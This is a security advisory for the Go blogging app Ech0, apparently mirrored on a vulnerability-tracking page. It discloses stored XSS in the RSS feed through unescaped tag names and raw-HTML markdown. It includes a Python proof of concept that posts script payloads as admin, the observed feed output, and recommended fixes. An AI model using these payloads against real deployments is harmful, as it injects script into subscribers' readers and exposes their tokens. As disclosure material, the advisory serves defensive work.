GHSA-3V85-FQVH-7RXF

Vulnerability from github – Published: 2026-05-07 21:18 – Updated: 2026-05-07 21:18
VLAI?
Summary
Ech0's RSS feed renders unescaped tag names and raw-HTML markdown, stored XSS against subscribers
Details

Summary

The public RSS/Atom feed at /rss renders two attacker-controlled surfaces without HTML escaping. Tag names flow through fmt.Appendf(renderedContent, "<br /><span class=\"tag\">#%s</span>", tag.Name) at internal/service/common/common.go:120, and the Markdown renderer at internal/util/md/md.go does not set the html.SkipHTML flag, so raw HTML blocks in echo content pass through unmodified. The resulting Atom <summary type="html"> is valid XML but contains executable <script> tags after the RSS reader decodes it. RSS subscribers whose readers render HTML (including many self-hosted and desktop clients) execute attacker JavaScript in the reader's origin.

Details

Tag sink at internal/service/common/common.go:120:

if len(msg.Tags) > 0 {
    for _, tag := range msg.Tags {
        renderedContent = fmt.Appendf(renderedContent,
            "<br /><span class=\"tag\">#%s</span>", tag.Name)
    }
}

fmt.Appendf with %s does not HTML-escape. Tag names come from user-supplied EchoUpsertDto.Tags and are persisted after strings.TrimSpace(strings.TrimPrefix(tag.Name, "#")) at internal/service/echo/echo.go:326, which strips a leading # and trims whitespace but does nothing about HTML metacharacters. A tag name of </span><script>document.title='RSS-XSS-HIT'</script><span>x breaks out of the surrounding <span> element and injects executable JavaScript into the RSS summary field.

Markdown sink at internal/util/md/md.go:

htmlFlags := html.CommonFlags | html.Safelink | html.HrefTargetBlank |
             html.NoopenerLinks | html.NoreferrerLinks
// html.SkipHTML is NOT set

The gomarkdown library passes raw HTML through when SkipHTML is not set. MdToHTML([]byte(msg.Content)) at internal/service/common/common.go:102 produces the rendered HTML for the echo body; tag markup is appended to that output at line 120 and the combined byte slice becomes the RSS summary field.

The RSS feed declares <summary type="html">, which per Atom RFC 4287 §3.1.1.3 means the content is HTML encoded as XML. RSS readers that render HTML decode the XML entities and pass the decoded string to an HTML renderer. Any script tag survives this round-trip.

Echo creation requires admin role (internal/service/echo/echo.go:54-56 checks user.IsAdmin). In a single-admin Ech0 instance this is self-attack. In a multi-admin deployment (non-owner admins promoted by the owner), one admin injects XSS into the shared RSS feed consumed by other admins, registered users, and anonymous subscribers.

Prior precedent: GHSA-69hx-63pv-f8f4 (2026-04-09) accepted stored XSS via SVG file upload, with the same "admin creates content" precondition. Cross-subscriber RSS XSS from one admin belongs to the same class.

Proof of Concept

Default install, admin account seeds malicious tag + markdown content, anonymous subscriber fetches /rss and the decoded summary contains executable <script>:

import requests, xml.etree.ElementTree as ET, html
TARGET = "http://localhost:8300"

# Admin creates two echoes: one with a hostile tag name, one with raw-HTML markdown.
owner = requests.post(f"{TARGET}/api/login",
                      json={"username": "owner", "password": "owner-pw"}
                     ).json()["data"]["access_token"]

tag_payload = "</span><script>document.title='RSS-XSS-HIT'</script><span>x"
md_payload = "<script>document.title='MD-XSS-HIT'</script>normal text"

requests.post(f"{TARGET}/api/echos",
              headers={"Authorization": f"Bearer {owner}",
                       "content-type": "application/json"},
              json={"content": "echo with malicious tag",
                    "tags": [tag_payload]})

requests.post(f"{TARGET}/api/echos",
              headers={"Authorization": f"Bearer {owner}",
                       "content-type": "application/json"},
              json={"content": md_payload})

# Anyone fetches /rss anonymously.
feed = requests.get(f"{TARGET}/rss").text
root = ET.fromstring(feed)
ns = {"atom": "http://www.w3.org/2005/Atom"}
for entry in root.findall("atom:entry", ns):
    summary = entry.find("atom:summary", ns)
    decoded = html.unescape(summary.text or "")
    if "<script>" in decoded.lower():
        print(f"  *** EXECUTABLE <script> in decoded summary ***")
        print(f"    raw:     {(summary.text or '')[:200]!r}")
        print(f"    decoded: {decoded[:200]!r}")

Observed on v4.5.6:

*** EXECUTABLE <script> in decoded summary ***
  raw:     "<p><script>document.title=&lsquo;MD-XSS-HIT&rsquo;</script>normal text</p>\n"
  decoded: "<p><script>document.title='MD-XSS-HIT'</script>normal text</p>\n"
*** EXECUTABLE <script> in decoded summary ***
  raw:     '<p>echo with malicious tag</p>\n<br /><span class="tag">#</span><script>document.title=\'RSS-XSS-HIT\'</script><span>x</span>'
  decoded: '<p>echo with malicious tag</p>\n<br /><span class="tag">#</span><script>document.title=\'RSS-XSS-HIT\'</script><span>x</span>'

Two separate <script> tags land in the public RSS feed: one via the tag-name sink, one via the markdown raw-HTML sink. Any RSS reader that decodes type="html" content and renders the HTML (common in self-hosted readers like Tiny Tiny RSS and FreshRSS's default settings, and in several desktop readers) executes the script.

Impact

A non-owner admin with echo-creation rights (or the owner themselves if RSS pushes to subscribers the owner did not hand-pick) injects persistent JavaScript into the public RSS feed. The RSS feed reaches:

  • Anonymous subscribers who follow the blog's RSS URL in their reader.
  • Registered non-admin users who may subscribe to the feed.
  • Other admins on the same instance.

Each subscriber whose reader renders type="html" content runs the attacker's script in the reader's origin. Depending on the reader, the payload:

  • Reads the reader's own UI tokens and exfiltrates them.
  • Makes authenticated requests to other feeds the reader polls (cross-feed data theft).
  • Plants phishing content that looks like a legitimate feed entry.

The class is stored XSS with cross-user reach. Severity compared to GHSA-69hx-63pv-f8f4 (SVG-upload stored XSS, accepted as Medium): reach is similar (anonymous subscribers via a published feed URL), and the admin precondition matches.

Recommended Fix

Two independent fixes, both needed.

Tag names: HTML-escape before interpolation.

for _, tag := range msg.Tags {
    renderedContent = fmt.Appendf(renderedContent,
        "<br /><span class=\"tag\">#%s</span>", html.EscapeString(tag.Name))
}

Markdown: add html.SkipHTML to the renderer flags so raw HTML in echo markdown is stripped.

htmlFlags := html.CommonFlags |
             html.Safelink |
             html.HrefTargetBlank |
             html.NoopenerLinks |
             html.NoreferrerLinks |
             html.SkipHTML

Validate tag names at creation time too. A central validator in EchoService.Create that rejects tags containing <, >, or " removes the attacker payload before it reaches the DB:

for _, name := range newEcho.Tags {
    if strings.ContainsAny(name, "<>\"'&") {
        return errors.New(commonModel.INVALID_TAG_NAME)
    }
}

Found by aisafe.io

Severity ?
4.8 (Medium)
CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N
Show details on source website
To clipboard 

{
  "affected": [
    {
      "package": {
        "ecosystem": "Go",
        "name": "github.com/lin-snow/Ech0"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "1.4.8-0.20260503035519-fd320fe3e902"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [],
  "database_specific": {
    "cwe_ids": [
      "CWE-116",
      "CWE-79"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2026-05-07T21:18:27Z",
    "nvd_published_at": null,
    "severity": "MODERATE"
  },
  "details": "## Summary\n\nThe public RSS/Atom feed at `/rss` renders two attacker-controlled surfaces without HTML escaping. Tag names flow through `fmt.Appendf(renderedContent, \"\u003cbr /\u003e\u003cspan class=\\\"tag\\\"\u003e#%s\u003c/span\u003e\", tag.Name)` at `internal/service/common/common.go:120`, and the Markdown renderer at `internal/util/md/md.go` does not set the `html.SkipHTML` flag, so raw HTML blocks in echo content pass through unmodified. The resulting Atom `\u003csummary type=\"html\"\u003e` is valid XML but contains executable `\u003cscript\u003e` tags after the RSS reader decodes it. RSS subscribers whose readers render HTML (including many self-hosted and desktop clients) execute attacker JavaScript in the reader\u0027s origin.\n\n## Details\n\nTag sink at `internal/service/common/common.go:120`:\n\n```go\nif len(msg.Tags) \u003e 0 {\n    for _, tag := range msg.Tags {\n        renderedContent = fmt.Appendf(renderedContent,\n            \"\u003cbr /\u003e\u003cspan class=\\\"tag\\\"\u003e#%s\u003c/span\u003e\", tag.Name)\n    }\n}\n```\n\n`fmt.Appendf` with `%s` does not HTML-escape. Tag names come from user-supplied `EchoUpsertDto.Tags` and are persisted after `strings.TrimSpace(strings.TrimPrefix(tag.Name, \"#\"))` at `internal/service/echo/echo.go:326`, which strips a leading `#` and trims whitespace but does nothing about HTML metacharacters. A tag name of `\u003c/span\u003e\u003cscript\u003edocument.title=\u0027RSS-XSS-HIT\u0027\u003c/script\u003e\u003cspan\u003ex` breaks out of the surrounding `\u003cspan\u003e` element and injects executable JavaScript into the RSS `summary` field.\n\nMarkdown sink at `internal/util/md/md.go`:\n\n```go\nhtmlFlags := html.CommonFlags | html.Safelink | html.HrefTargetBlank |\n             html.NoopenerLinks | html.NoreferrerLinks\n// html.SkipHTML is NOT set\n```\n\nThe `gomarkdown` library passes raw HTML through when `SkipHTML` is not set. `MdToHTML([]byte(msg.Content))` at `internal/service/common/common.go:102` produces the rendered HTML for the echo body; tag markup is appended to that output at line 120 and the combined byte slice becomes the RSS `summary` field.\n\nThe RSS feed declares `\u003csummary type=\"html\"\u003e`, which per Atom RFC 4287 \u00a73.1.1.3 means the content is HTML encoded as XML. RSS readers that render HTML decode the XML entities and pass the decoded string to an HTML renderer. Any script tag survives this round-trip.\n\nEcho creation requires admin role (`internal/service/echo/echo.go:54-56` checks `user.IsAdmin`). In a single-admin Ech0 instance this is self-attack. In a multi-admin deployment (non-owner admins promoted by the owner), one admin injects XSS into the shared RSS feed consumed by other admins, registered users, and anonymous subscribers.\n\nPrior precedent: GHSA-69hx-63pv-f8f4 (2026-04-09) accepted stored XSS via SVG file upload, with the same \"admin creates content\" precondition. Cross-subscriber RSS XSS from one admin belongs to the same class.\n\n## Proof of Concept\n\nDefault install, admin account seeds malicious tag + markdown content, anonymous subscriber fetches `/rss` and the decoded summary contains executable `\u003cscript\u003e`:\n\n```python\nimport requests, xml.etree.ElementTree as ET, html\nTARGET = \"http://localhost:8300\"\n\n# Admin creates two echoes: one with a hostile tag name, one with raw-HTML markdown.\nowner = requests.post(f\"{TARGET}/api/login\",\n                      json={\"username\": \"owner\", \"password\": \"owner-pw\"}\n                     ).json()[\"data\"][\"access_token\"]\n\ntag_payload = \"\u003c/span\u003e\u003cscript\u003edocument.title=\u0027RSS-XSS-HIT\u0027\u003c/script\u003e\u003cspan\u003ex\"\nmd_payload = \"\u003cscript\u003edocument.title=\u0027MD-XSS-HIT\u0027\u003c/script\u003enormal text\"\n\nrequests.post(f\"{TARGET}/api/echos\",\n              headers={\"Authorization\": f\"Bearer {owner}\",\n                       \"content-type\": \"application/json\"},\n              json={\"content\": \"echo with malicious tag\",\n                    \"tags\": [tag_payload]})\n\nrequests.post(f\"{TARGET}/api/echos\",\n              headers={\"Authorization\": f\"Bearer {owner}\",\n                       \"content-type\": \"application/json\"},\n              json={\"content\": md_payload})\n\n# Anyone fetches /rss anonymously.\nfeed = requests.get(f\"{TARGET}/rss\").text\nroot = ET.fromstring(feed)\nns = {\"atom\": \"http://www.w3.org/2005/Atom\"}\nfor entry in root.findall(\"atom:entry\", ns):\n    summary = entry.find(\"atom:summary\", ns)\n    decoded = html.unescape(summary.text or \"\")\n    if \"\u003cscript\u003e\" in decoded.lower():\n        print(f\"  *** EXECUTABLE \u003cscript\u003e in decoded summary ***\")\n        print(f\"    raw:     {(summary.text or \u0027\u0027)[:200]!r}\")\n        print(f\"    decoded: {decoded[:200]!r}\")\n```\n\nObserved on v4.5.6:\n\n```\n*** EXECUTABLE \u003cscript\u003e in decoded summary ***\n  raw:     \"\u003cp\u003e\u003cscript\u003edocument.title=\u0026lsquo;MD-XSS-HIT\u0026rsquo;\u003c/script\u003enormal text\u003c/p\u003e\\n\"\n  decoded: \"\u003cp\u003e\u003cscript\u003edocument.title=\u0027MD-XSS-HIT\u0027\u003c/script\u003enormal text\u003c/p\u003e\\n\"\n*** EXECUTABLE \u003cscript\u003e in decoded summary ***\n  raw:     \u0027\u003cp\u003eecho with malicious tag\u003c/p\u003e\\n\u003cbr /\u003e\u003cspan class=\"tag\"\u003e#\u003c/span\u003e\u003cscript\u003edocument.title=\\\u0027RSS-XSS-HIT\\\u0027\u003c/script\u003e\u003cspan\u003ex\u003c/span\u003e\u0027\n  decoded: \u0027\u003cp\u003eecho with malicious tag\u003c/p\u003e\\n\u003cbr /\u003e\u003cspan class=\"tag\"\u003e#\u003c/span\u003e\u003cscript\u003edocument.title=\\\u0027RSS-XSS-HIT\\\u0027\u003c/script\u003e\u003cspan\u003ex\u003c/span\u003e\u0027\n```\n\nTwo separate `\u003cscript\u003e` tags land in the public RSS feed: one via the tag-name sink, one via the markdown raw-HTML sink. Any RSS reader that decodes `type=\"html\"` content and renders the HTML (common in self-hosted readers like Tiny Tiny RSS and FreshRSS\u0027s default settings, and in several desktop readers) executes the script.\n\n## Impact\n\nA non-owner admin with echo-creation rights (or the owner themselves if RSS pushes to subscribers the owner did not hand-pick) injects persistent JavaScript into the public RSS feed. The RSS feed reaches:\n\n- **Anonymous subscribers** who follow the blog\u0027s RSS URL in their reader.\n- **Registered non-admin users** who may subscribe to the feed.\n- **Other admins** on the same instance.\n\nEach subscriber whose reader renders `type=\"html\"` content runs the attacker\u0027s script in the reader\u0027s origin. Depending on the reader, the payload:\n\n- Reads the reader\u0027s own UI tokens and exfiltrates them.\n- Makes authenticated requests to other feeds the reader polls (cross-feed data theft).\n- Plants phishing content that looks like a legitimate feed entry.\n\nThe class is stored XSS with cross-user reach. Severity compared to GHSA-69hx-63pv-f8f4 (SVG-upload stored XSS, accepted as Medium): reach is similar (anonymous subscribers via a published feed URL), and the admin precondition matches.\n\n## Recommended Fix\n\nTwo independent fixes, both needed.\n\nTag names: HTML-escape before interpolation.\n\n```go\nfor _, tag := range msg.Tags {\n    renderedContent = fmt.Appendf(renderedContent,\n        \"\u003cbr /\u003e\u003cspan class=\\\"tag\\\"\u003e#%s\u003c/span\u003e\", html.EscapeString(tag.Name))\n}\n```\n\nMarkdown: add `html.SkipHTML` to the renderer flags so raw HTML in echo markdown is stripped.\n\n```go\nhtmlFlags := html.CommonFlags |\n             html.Safelink |\n             html.HrefTargetBlank |\n             html.NoopenerLinks |\n             html.NoreferrerLinks |\n             html.SkipHTML\n```\n\nValidate tag names at creation time too. A central validator in `EchoService.Create` that rejects tags containing `\u003c`, `\u003e`, or `\"` removes the attacker payload before it reaches the DB:\n\n```go\nfor _, name := range newEcho.Tags {\n    if strings.ContainsAny(name, \"\u003c\u003e\\\"\u0027\u0026\") {\n        return errors.New(commonModel.INVALID_TAG_NAME)\n    }\n}\n```\n\n---\n*Found by [aisafe.io](https://aisafe.io)*",
  "id": "GHSA-3v85-fqvh-7rxf",
  "modified": "2026-05-07T21:18:27Z",
  "published": "2026-05-07T21:18:27Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/lin-snow/Ech0/security/advisories/GHSA-3v85-fqvh-7rxf"
    },
    {
      "type": "WEB",
      "url": "https://github.com/lin-snow/Ech0/commit/fd320fe3e9021c8d8d284fb274775c018690520e"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/lin-snow/Ech0"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N",
      "type": "CVSS_V3"
    }
  ],
  "summary": "Ech0\u0027s RSS feed renders unescaped tag names and raw-HTML markdown, stored XSS against subscribers"
}


Log in or create an account to share your comment.




Tags
Taxonomy of the tags.




Forecast uses a logistic model when the trend is rising, or an exponential decay model when the trend is falling. Fitted via linearized least squares.

Sightings

Author Source Type Date Other

Nomenclature

  • Seen: The vulnerability was mentioned, discussed, or observed by the user.
  • Confirmed: The vulnerability has been validated from an analyst's perspective.
  • Published Proof of Concept: A public proof of concept is available for this vulnerability.
  • Exploited: The vulnerability was observed as exploited by the user who reported the sighting.
  • Patched: The vulnerability was observed as successfully patched by the user who reported the sighting.
  • Not exploited: The vulnerability was not observed as exploited by the user who reported the sighting.
  • Not confirmed: The user expressed doubt about the validity of the vulnerability.
  • Not patched: The vulnerability was not observed as successfully patched by the user who reported the sighting.



Detection rules are retrieved from Rulezet.